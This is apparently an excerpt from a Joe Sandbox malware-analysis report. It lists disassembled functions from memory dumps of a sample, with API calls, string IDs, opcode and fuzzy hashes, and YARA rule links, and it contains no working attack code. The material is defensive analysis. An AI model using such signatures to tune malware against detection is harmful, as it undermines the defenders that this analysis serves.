                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer
                                            • String ID: DCDO$EDO*
                                            • API String ID: 1385522511-3480089779
                                            • Opcode ID: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                            • Instruction ID: 0733c1ed96291199093b0a74c4441dde591ed678cc53609efc81a7751b2a7550
                                            • Opcode Fuzzy Hash: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                            • Instruction Fuzzy Hash: 36018B70F042089BDB60DFA4EC81F5CB7B1AB08708F9041AACA0597690DA38AA029B49
                                            Function 04CF6D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF6D79
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer
                                            • String ID: DCDO$^]E*
                                            • API String ID: 1385522511-2708296792
                                            • Opcode ID: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                            • Instruction ID: ea66ae5ea0145c1e6f623e3056e29efe1cc4640a6fa652fbad59014a98026ea5
                                            • Opcode Fuzzy Hash: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                            • Instruction Fuzzy Hash: 2C0186B0F00208DBDB60EFA8DC82B9D77B19744304F90417AE91957390DA397985DF49
                                            Function 00407800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407869
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: DCDO$EDO*
                                            • API String ID: 2296764815-3480089779
                                            • Opcode ID: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                            • Instruction ID: 2c0c492e7e72bdb30d52bd5223af33e2dc0730c32d16496d374a94bf7777f62b
                                            • Opcode Fuzzy Hash: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                            • Instruction Fuzzy Hash: 5B016275F08208DBDB20EFA5D842E5DB7B0AB14708F50417ED916A7791DA38AD02CF4D
                                            Function 00407910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407979
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: DCDO$^]E*
                                            • API String ID: 2296764815-2708296792
                                            • Opcode ID: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                            • Instruction ID: a49365da1333b78fae32507e70f919b170a79118b3a39b38b1efb03faeb462bb
                                            • Opcode Fuzzy Hash: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                            • Instruction Fuzzy Hash: 92011DB0F042089BD720EFA9E883A9DB7A0A784704F90417FE919A7391D6396D81CF4D
                                            Function 04B4865C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CommandLine
                                            • String ID: 8&
                                            • API String ID: 3253501508-2786664035
                                            • Opcode ID: 005b996f4718cbf0254f6661f3f76b5c5ab198b8c8231b5c0c2d510abb6e9a0a
                                            • Instruction ID: 1d1b4c5e6aab5f85f196b9203e4414d0558178062dbdd849f9fa9c869a544131
                                            • Opcode Fuzzy Hash: 005b996f4718cbf0254f6661f3f76b5c5ab198b8c8231b5c0c2d510abb6e9a0a
                                            • Instruction Fuzzy Hash: 5DB008799116008B8760AF64A9181857FA1B6996023D496BAD829C2661E775400ADA19
                                            Function 004183F5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CommandLine
                                            • String ID: 8&
                                            • API String ID: 3253501508-2786664035
                                            • Opcode ID: 005b996f4718cbf0254f6661f3f76b5c5ab198b8c8231b5c0c2d510abb6e9a0a
                                            • Instruction ID: 1d1b4c5e6aab5f85f196b9203e4414d0558178062dbdd849f9fa9c869a544131
                                            • Opcode Fuzzy Hash: 005b996f4718cbf0254f6661f3f76b5c5ab198b8c8231b5c0c2d510abb6e9a0a
                                            • Instruction Fuzzy Hash: 5DB008799116008B8760AF64A9181857FA1B6996023D496BAD829C2661E775400ADA19
                                            Function 10008D2F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CommandLine
                                            • String ID: 8&
                                            • API String ID: 3253501508-2786664035
                                            • Opcode ID: 3ba90f2367f8e0a18ddc49a1e9980fdff55fe193054f5fcf533812e7e38a396c
                                            • Instruction ID: dc4300c7a51cdd2e4dbd1a00831958a42e7aa1dccf9adf5096b7a17c71704a83
                                            • Opcode Fuzzy Hash: 3ba90f2367f8e0a18ddc49a1e9980fdff55fe193054f5fcf533812e7e38a396c
                                            • Instruction Fuzzy Hash: 78B09278C00221BFEB048F3088CD0C47BA0B22C203380C0A5EA01C2720D634C1C1CF80